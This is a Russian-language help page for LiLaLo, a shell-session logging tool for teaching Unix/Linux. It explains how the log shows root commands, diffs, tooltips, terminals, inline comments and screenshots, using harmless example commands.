Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id

uid=0(root) gid=0(root) Gruppen=0(root)
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc

2a3,5 > if [ -f /usr/local/etc/bash_completion ]; then > . /usr/local/etc/bash_completion > fi
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc
В данном случае изменения применяются к файлу ~/.bashrc
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.

Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
```
$ whoami
```
```
user
```
```
$ #^ Интересно, кто я?
```
в журнале это будет выглядеть так:
```
$ whoami
```
```
user
```
Интересно, кто я?

Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:

$ whoami

user

$ cat > /dev/null #^ Интересно, кто я?

Программа whoami выводит имя пользователя, под которым 
мы зарегистрировались в системе.
-
Она не может ответить на вопрос о нашем назначении 
в этом мире.

В журнале это будет выглядеть так:

$ whoami

user

Интересно, кто я?

Программа whoami выводит имя пользователя, под которым
мы зарегистрировались в системе.

Она не может ответить на вопрос о нашем назначении
в этом мире.

Для разделения нескольких абзацев между собой используйте символ "-", один в строке.

Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=

Содержимое файла может быть показано в журнале. Для этого его нужно вывести с помощью программы cat. Если вывод команды отметить симоволами #!, содержимое файла будет показано в журнале в специально отведённой для этого секции.

Для того чтобы вставить скриншот интересующего вас окна в журнал, нужно воспользоваться командой l3shot. После того как команда вызвана, нужно с помощью мыши выбрать окно, которое должно быть в журнале.

Команды в журнале расположены в хронологическом порядке. Если две команды давались одна за другой, но на разных терминалах, в журнале они будут рядом, даже если они не имеют друг к другу никакого отношения.
```
1
    2
3   
    4
```
Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.

О программе

LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008

$Id$